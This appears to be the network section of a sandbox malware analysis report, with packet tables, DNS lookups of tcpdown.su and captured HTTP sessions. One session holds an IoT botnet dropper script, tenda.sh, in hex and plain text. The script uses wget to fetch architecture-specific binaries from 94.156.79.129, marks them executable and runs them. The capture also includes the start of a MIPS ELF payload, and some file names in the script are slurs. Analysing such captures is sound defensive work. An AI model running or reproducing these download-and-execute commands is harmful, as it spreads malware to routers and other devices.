Apr 25, 2024 19:36:21.486253023 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.486253023 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.486253023 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.486253023 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.486264944 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.681346893 CEST	52826	21425	192.168.2.20	198.12.124.76
Apr 25, 2024 19:36:21.718089104 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.718127012 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.718183994 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.718205929 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.718226910 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.718247890 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.718270063 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.718291044 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.718312979 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.718312025 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.718312979 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.718312979 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.718312979 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.718312979 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.718312979 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.718312979 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.718336105 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.718399048 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.718420982 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.718449116 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.718468904 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.718492031 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.718569040 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.718590021 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.718607903 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.718607903 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.718607903 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.718607903 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.718607903 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.718611956 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.718632936 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.718632936 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.718632936 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.718632936 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.718641043 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.718646049 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.718646049 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.718662977 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.718702078 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.718702078 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.908088923 CEST	21425	52826	198.12.124.76	192.168.2.20
Apr 25, 2024 19:36:21.908283949 CEST	52826	21425	192.168.2.20	198.12.124.76
Apr 25, 2024 19:36:21.908559084 CEST	52826	21425	192.168.2.20	198.12.124.76
Apr 25, 2024 19:36:21.950685024 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.950740099 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.950778961 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.950815916 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.950855970 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.950894117 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.950932980 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.950969934 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.951006889 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.951045990 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.951055050 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.951055050 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.951055050 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.951055050 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.951056004 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.951056004 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.951056004 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.951056004 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.951086044 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.951143980 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.951267958 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.951308012 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.951345921 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.951358080 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.951358080 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.951358080 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.951385975 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.951397896 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.951397896 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.951397896 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.951397896 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.951426029 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.951483011 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.951488972 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.951488972 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.951523066 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.951560020 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.951611996 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.951647997 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.951724052 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.951762915 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.951814890 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.951814890 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.951837063 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.951847076 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.951847076 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.951847076 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.951847076 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.951847076 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.951877117 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.951880932 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.951920033 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.951960087 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.951997042 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.952033997 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.952126026 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.952177048 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.952186108 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.952186108 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.952187061 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.952187061 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.952187061 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:21.952214956 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.952253103 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.952290058 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.952327967 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.952579021 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.952615976 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.952653885 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.952691078 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:21.988677979 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:22.134704113 CEST	21425	52826	198.12.124.76	192.168.2.20
Apr 25, 2024 19:36:22.137022972 CEST	52826	21425	192.168.2.20	198.12.124.76
Apr 25, 2024 19:36:22.185796976 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:22.185864925 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:22.185906887 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:22.185946941 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:22.185985088 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:22.186023951 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:22.186062098 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:22.186100006 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:22.186158895 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:22.224615097 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:22.363199949 CEST	21425	52826	198.12.124.76	192.168.2.20
Apr 25, 2024 19:36:31.916712999 CEST	52826	21425	192.168.2.20	198.12.124.76
Apr 25, 2024 19:36:32.143129110 CEST	21425	52826	198.12.124.76	192.168.2.20
Apr 25, 2024 19:36:32.143157959 CEST	21425	52826	198.12.124.76	192.168.2.20
Apr 25, 2024 19:36:32.143367052 CEST	52826	21425	192.168.2.20	198.12.124.76
Apr 25, 2024 19:36:37.462718010 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:37.462833881 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:36:47.478446960 CEST	21425	52826	198.12.124.76	192.168.2.20
Apr 25, 2024 19:36:47.478576899 CEST	52826	21425	192.168.2.20	198.12.124.76
Apr 25, 2024 19:36:52.698848009 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:36:52.699081898 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:37:02.706602097 CEST	21425	52826	198.12.124.76	192.168.2.20
Apr 25, 2024 19:37:02.706864119 CEST	52826	21425	192.168.2.20	198.12.124.76
Apr 25, 2024 19:37:07.934833050 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:37:07.935137987 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:37:17.943388939 CEST	21425	52826	198.12.124.76	192.168.2.20
Apr 25, 2024 19:37:17.943654060 CEST	52826	21425	192.168.2.20	198.12.124.76
Apr 25, 2024 19:37:23.190884113 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:37:23.190989017 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:37:32.188884020 CEST	52826	21425	192.168.2.20	198.12.124.76
Apr 25, 2024 19:37:32.415541887 CEST	21425	52826	198.12.124.76	192.168.2.20
Apr 25, 2024 19:37:32.415685892 CEST	52826	21425	192.168.2.20	198.12.124.76
Apr 25, 2024 19:37:38.426743984 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:37:38.426891088 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:37:47.896023989 CEST	21425	52826	198.12.124.76	192.168.2.20
Apr 25, 2024 19:37:47.896280050 CEST	52826	21425	192.168.2.20	198.12.124.76
Apr 25, 2024 19:37:53.662862062 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:37:53.663048029 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:38:03.124341011 CEST	21425	52826	198.12.124.76	192.168.2.20
Apr 25, 2024 19:38:03.124573946 CEST	52826	21425	192.168.2.20	198.12.124.76
Apr 25, 2024 19:38:08.898870945 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:38:08.899061918 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:38:18.360649109 CEST	21425	52826	198.12.124.76	192.168.2.20
Apr 25, 2024 19:38:18.360852003 CEST	52826	21425	192.168.2.20	198.12.124.76
Apr 25, 2024 19:38:24.134902000 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:38:24.135086060 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:38:32.461025000 CEST	52826	21425	192.168.2.20	198.12.124.76
Apr 25, 2024 19:38:32.687654972 CEST	21425	52826	198.12.124.76	192.168.2.20
Apr 25, 2024 19:38:32.687856913 CEST	52826	21425	192.168.2.20	198.12.124.76
Apr 25, 2024 19:38:39.370894909 CEST	80	58178	94.156.79.129	192.168.2.20
Apr 25, 2024 19:38:39.371025085 CEST	58178	80	192.168.2.20	94.156.79.129
Apr 25, 2024 19:38:48.058757067 CEST	21425	52826	198.12.124.76	192.168.2.20
Apr 25, 2024 19:38:48.058907032 CEST	52826	21425	192.168.2.20	198.12.124.76

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 25, 2024 19:36:20.710521936 CEST	44137	53	192.168.2.20	1.1.1.1
Apr 25, 2024 19:36:21.028964043 CEST	53	44137	1.1.1.1	192.168.2.20
Apr 25, 2024 19:36:21.029623985 CEST	49728	53	192.168.2.20	1.1.1.1
Apr 25, 2024 19:36:21.160051107 CEST	53	49728	1.1.1.1	192.168.2.20
Apr 25, 2024 19:36:21.169415951 CEST	44602	53	192.168.2.20	1.1.1.1
Apr 25, 2024 19:36:21.301292896 CEST	53	44602	1.1.1.1	192.168.2.20
Apr 25, 2024 19:36:21.304723978 CEST	56822	53	192.168.2.20	1.1.1.1
Apr 25, 2024 19:36:21.394782066 CEST	48267	53	192.168.2.20	8.8.8.8
Apr 25, 2024 19:36:21.394782066 CEST	48267	53	192.168.2.20	8.8.8.8
Apr 25, 2024 19:36:21.438009024 CEST	53	56822	1.1.1.1	192.168.2.20
Apr 25, 2024 19:36:21.438829899 CEST	56826	53	192.168.2.20	1.1.1.1
Apr 25, 2024 19:36:21.504977942 CEST	53	48267	8.8.8.8	192.168.2.20
Apr 25, 2024 19:36:21.505017996 CEST	53	48267	8.8.8.8	192.168.2.20
Apr 25, 2024 19:36:21.549966097 CEST	53	56826	1.1.1.1	192.168.2.20
Apr 25, 2024 19:36:21.550108910 CEST	37618	53	192.168.2.20	1.1.1.1
Apr 25, 2024 19:36:21.677285910 CEST	53	37618	1.1.1.1	192.168.2.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 25, 2024 19:36:21.029623985 CEST	192.168.2.20	1.1.1.1	0xc65b	Standard query (0)	tcpdown.su@v	A (IP address)	IN (0x0001)	false
Apr 25, 2024 19:36:21.169415951 CEST	192.168.2.20	1.1.1.1	0xc65b	Standard query (0)	tcpdown.su@v	A (IP address)	IN (0x0001)	false
Apr 25, 2024 19:36:21.304723978 CEST	192.168.2.20	1.1.1.1	0xc65b	Standard query (0)	tcpdown.su@v	A (IP address)	IN (0x0001)	false
Apr 25, 2024 19:36:21.394782066 CEST	192.168.2.20	8.8.8.8	0x589a	Standard query (0)	daisy.ubuntu.com	A (IP address)	IN (0x0001)	false
Apr 25, 2024 19:36:21.394782066 CEST	192.168.2.20	8.8.8.8	0x5e2c	Standard query (0)	daisy.ubuntu.com	28	IN (0x0001)	false
Apr 25, 2024 19:36:21.438829899 CEST	192.168.2.20	1.1.1.1	0xc65b	Standard query (0)	tcpdown.su@v	A (IP address)	IN (0x0001)	false
Apr 25, 2024 19:36:21.550108910 CEST	192.168.2.20	1.1.1.1	0xc65b	Standard query (0)	tcpdown.su@v	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 25, 2024 19:36:21.028964043 CEST	1.1.1.1	192.168.2.20	0xfe66	No error (0)	tcpdown.su		172.245.119.70	A (IP address)	IN (0x0001)	false
Apr 25, 2024 19:36:21.028964043 CEST	1.1.1.1	192.168.2.20	0xfe66	No error (0)	tcpdown.su		172.245.119.63	A (IP address)	IN (0x0001)	false
Apr 25, 2024 19:36:21.028964043 CEST	1.1.1.1	192.168.2.20	0xfe66	No error (0)	tcpdown.su		104.168.32.17	A (IP address)	IN (0x0001)	false
Apr 25, 2024 19:36:21.028964043 CEST	1.1.1.1	192.168.2.20	0xfe66	No error (0)	tcpdown.su		185.216.70.250	A (IP address)	IN (0x0001)	false
Apr 25, 2024 19:36:21.028964043 CEST	1.1.1.1	192.168.2.20	0xfe66	No error (0)	tcpdown.su		185.216.70.168	A (IP address)	IN (0x0001)	false
Apr 25, 2024 19:36:21.028964043 CEST	1.1.1.1	192.168.2.20	0xfe66	No error (0)	tcpdown.su		185.216.70.169	A (IP address)	IN (0x0001)	false
Apr 25, 2024 19:36:21.028964043 CEST	1.1.1.1	192.168.2.20	0xfe66	No error (0)	tcpdown.su		104.168.45.11	A (IP address)	IN (0x0001)	false
Apr 25, 2024 19:36:21.028964043 CEST	1.1.1.1	192.168.2.20	0xfe66	No error (0)	tcpdown.su		198.12.124.76	A (IP address)	IN (0x0001)	false
Apr 25, 2024 19:36:21.160051107 CEST	1.1.1.1	192.168.2.20	0xc65b	Name error (3)	tcpdown.su@v	none	none	A (IP address)	IN (0x0001)	false
Apr 25, 2024 19:36:21.301292896 CEST	1.1.1.1	192.168.2.20	0xc65b	Name error (3)	tcpdown.su@v	none	none	A (IP address)	IN (0x0001)	false
Apr 25, 2024 19:36:21.438009024 CEST	1.1.1.1	192.168.2.20	0xc65b	Name error (3)	tcpdown.su@v	none	none	A (IP address)	IN (0x0001)	false
Apr 25, 2024 19:36:21.504977942 CEST	8.8.8.8	192.168.2.20	0x589a	No error (0)	daisy.ubuntu.com		162.213.35.25	A (IP address)	IN (0x0001)	false
Apr 25, 2024 19:36:21.504977942 CEST	8.8.8.8	192.168.2.20	0x589a	No error (0)	daisy.ubuntu.com		162.213.35.24	A (IP address)	IN (0x0001)	false
Apr 25, 2024 19:36:21.549966097 CEST	1.1.1.1	192.168.2.20	0xc65b	Name error (3)	tcpdown.su@v	none	none	A (IP address)	IN (0x0001)	false
Apr 25, 2024 19:36:21.677285910 CEST	1.1.1.1	192.168.2.20	0xc65b	Name error (3)	tcpdown.su@v	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

94.156.79.129

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.20	58170	94.156.79.129	80

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 19:36:19.230726957 CEST	160	OUT	GET /tenda.sh HTTP/1.1 User-Agent: Wget/1.17.1 (linux-gnu) Accept: / Accept-Encoding: identity Host: 94.156.79.129 Connection: Keep-Alive
Apr 25, 2024 19:36:19.461636066 CEST	711	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 1664 Content-Type: application/x-shellscript Last-Modified: Thu, 18 Apr 2024 09:56:34 GMT Date: Thu, 25 Apr 2024 17:36:19 GMT Data Raw: 63 64 20 2f 74 6d 70 20 7c 7c 20 63 64 20 2f 76 61 72 2f 72 75 6e 20 7c 7c 20 63 64 20 2f 6d 6e 74 20 7c 7c 20 63 64 20 2f 72 6f 6f 74 20 7c 7c 20 63 64 20 2f 3b 20 77 67 65 74 20 2d 4f 20 6c 6f 6c 20 68 74 74 70 3a 2f 2f 39 34 2e 31 35 36 2e 37 39 2e 31 32 39 2f 6d 69 70 73 3b 20 63 68 6d 6f 64 20 2b 78 20 6c 6f 6c 3b 20 2e 2f 6c 6f 6c 20 74 70 6c 69 6e 6b 0d 0a 63 64 20 2f 74 6d 70 20 7c 7c 20 63 64 20 2f 76 61 72 2f 72 75 6e 20 7c 7c 20 63 64 20 2f 6d 6e 74 20 7c 7c 20 63 64 20 2f 72 6f 6f 74 20 7c 7c 20 63 64 20 2f 3b 20 77 67 65 74 20 2d 4f 20 6c 6d 61 6f 20 68 74 74 70 3a 2f 2f 39 34 2e 31 35 36 2e 37 39 2e 31 32 39 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 2b 78 20 6c 6d 61 6f 3b 20 2e 2f 6c 6d 61 6f 20 74 70 6c 69 6e 6b 0d 0a 63 64 20 2f 74 6d 70 20 7c 7c 20 63 64 20 2f 76 61 72 2f 72 75 6e 20 7c 7c 20 63 64 20 2f 6d 6e 74 20 7c 7c 20 63 64 20 2f 72 6f 6f 74 20 7c 7c 20 63 64 20 2f 3b 20 77 67 65 74 20 2d 4f 20 66 61 67 67 6f 74 20 68 74 74 70 3a 2f 2f 39 34 2e 31 35 36 2e 37 39 2e 31 32 39 2f 78 38 36 5f 36 34 3b 20 63 68 6d 6f 64 20 2b 78 20 66 61 67 67 6f 74 3b 20 2e 2f 66 61 67 67 6f 74 20 74 70 6c 69 6e 6b 0d 0a 63 64 20 2f 74 6d 70 20 7c 7c 20 63 64 20 2f 76 61 72 2f 72 75 6e 20 7c 7c 20 63 64 20 2f 6d 6e 74 20 7c 7c 20 63 64 20 2f 72 6f 6f 74 20 7c 7c 20 63 64 20 2f 3b 20 77 67 65 74 20 2d 4f 20 67 61 79 20 68 74 74 70 3a 2f 2f 39 34 2e 31 35 36 2e 37 39 2e 31 32 39 2f 61 72 6d 3b 20 63 68 6d 6f 64 20 2b 78 20 67 61 79 3b 20 2e 2f 67 61 79 20 74 70 6c 69 6e 6b 0d 0a 63 64 20 2f 74 6d 70 20 7c 7c 20 Data Ascii: cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget -O lol http://94.156.79.129/mips; chmod +x lol; ./lol tplinkcd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget -O lmao http://94.156.79.129/mpsl; chmod +x lmao; ./lmao tplinkcd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget -O faggot http://94.156.79.129/x86_64; chmod +x faggot; ./faggot tplinkcd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget -O gay http://94.156.79.129/arm; chmod +x gay; ./gay tplinkcd /tmp \|\|
Apr 25, 2024 19:36:19.461652994 CEST	1164	IN	Data Raw: 63 64 20 2f 76 61 72 2f 72 75 6e 20 7c 7c 20 63 64 20 2f 6d 6e 74 20 7c 7c 20 63 64 20 2f 72 6f 6f 74 20 7c 7c 20 63 64 20 2f 3b 20 77 67 65 74 20 2d 4f 20 72 65 74 61 72 64 20 68 74 74 70 3a 2f 2f 39 34 2e 31 35 36 2e 37 39 2e 31 32 39 2f 61 72 Data Ascii: cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget -O retard http://94.156.79.129/arm5; chmod +x retard; ./retard tplinkcd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget -O nigger http://94.156.79.129/arm6; chmod +x nigger; ./nigger

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.20	58172	94.156.79.129	80

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 19:36:19.725193024 CEST	156	OUT	GET /mips HTTP/1.1 User-Agent: Wget/1.17.1 (linux-gnu) Accept: / Accept-Encoding: identity Host: 94.156.79.129 Connection: Keep-Alive
Apr 25, 2024 19:36:19.952186108 CEST	711	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 97724 Content-Type: application/octet-stream Last-Modified: Sat, 20 Apr 2024 04:31:18 GMT Date: Thu, 25 Apr 2024 17:36:19 GMT Data Raw: 7f 45 4c 46 01 02 01 00 00 00 00 00 00 00 00 00 00 02 00 08 00 00 00 01 00 40 02 60 00 00 00 34 00 01 7b 8c 00 00 10 07 00 34 00 20 00 03 00 28 00 0e 00 0d 00 00 00 01 00 00 00 00 00 40 00 00 00 40 00 00 00 01 71 30 00 01 71 30 00 00 00 05 00 01 00 00 00 00 00 01 00 01 71 34 00 45 71 34 00 45 71 34 00 00 09 f4 00 00 f1 9c 00 00 00 06 00 01 00 00 64 74 e5 51 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 04 3c 1c 00 06 27 9c f4 ac 03 99 e0 21 27 bd ff e0 af bc 00 10 af bf 00 1c af bc 00 18 04 11 00 01 00 00 00 00 3c 1c 00 06 27 9c f4 88 03 9f e0 21 8f 99 80 20 00 00 00 00 27 39 01 dc 03 20 f8 09 00 00 00 00 8f bc 00 10 00 00 00 00 04 11 00 01 00 00 00 00 3c 1c 00 06 27 9c f4 58 03 9f e0 21 8f 99 80 1c 00 00 00 00 27 39 48 00 03 20 f8 09 00 00 00 00 8f bc 00 10 00 00 00 00 8f bf 00 1c 00 00 00 00 03 e0 00 08 27 bd 00 20 3c 1c 00 06 27 9c f4 20 03 99 e0 21 27 bd ff d8 af bf 00 20 af b1 00 1c af b0 00 18 af bc 00 10 8f 91 80 18 00 00 00 00 92 22 7b 60 00 00 00 00 14 40 00 1d 00 00 00 00 8f 90 80 18 00 00 00 00 8e 02 71 50 00 00 00 00 8c 59 00 00 00 00 00 00 13 20 00 09 24 42 00 04 03 20 f8 09 ae 02 71 50 8e 02 71 50 8f bc 00 10 8c 59 00 00 00 00 00 00 17 20 ff f9 24 42 00 04 8f 82 84 04 00 00 00 00 10 40 00 08 24 02 00 01 8f 84 80 1c 8f 99 84 04 00 00 00 00 03 20 f8 09 24 84 71 30 8f bc 00 10 24 02 00 01 a2 22 7b 60 8f bf 00 20 8f b1 00 1c 8f b0 00 18 03 e0 00 08 27 bd 00 28 3c 1c 00 06 27 9c f3 64 03 99 e0 21 27 bd ff e0 af bf 00 18 af bc 00 10 8f 84 80 1c 8f 85 80 18 8f 82 81 a0 Data Ascii: ELF@`4{4 (@@q0q0q4Eq4Eq4dtQ<'!'<'! '9 <'X!'9H ' <' !' "{`@qPY $B qPqPY $B@$ $q0$"{` '(<'d!'
Apr 25, 2024 19:36:19.952229023 CEST	1289	IN	Data Raw: 8f 99 81 a0 24 84 71 30 10 40 00 05 24 a5 7b 64 03 20 f8 09 00 00 00 00 8f bc 00 10 00 00 00 00 8f 84 80 18 8f 99 81 ac 8c 82 71 44 00 00 00 00 10 40 00 06 24 84 71 44 13 20 00 04 00 00 00 00 8f bf 00 18 03 20 00 08 27 bd 00 20 8f bf 00 18 00 00 Data Ascii: $q0@${d qD@$qD ' ' !<'!! '$$'tH <'p!'0,($
Apr 25, 2024 19:36:19.952299118 CEST	1289	IN	Data Raw: 40 28 21 02 13 10 21 24 44 00 06 24 06 00 02 92 42 00 04 8e 43 00 00 26 52 00 05 a0 a2 00 14 ac a3 00 04 ac a3 00 10 a4 a6 00 00 14 92 ff f8 24 a5 00 18 02 d7 10 21 02 22 10 23 24 54 ff fa 16 80 00 2b 00 00 00 00 af a0 00 24 8f a4 00 20 00 00 00 Data Ascii: @(!!$D$BC&R$!"#$T+$ $@@!!&1&@@ ! $TPLHD@<840 'XB
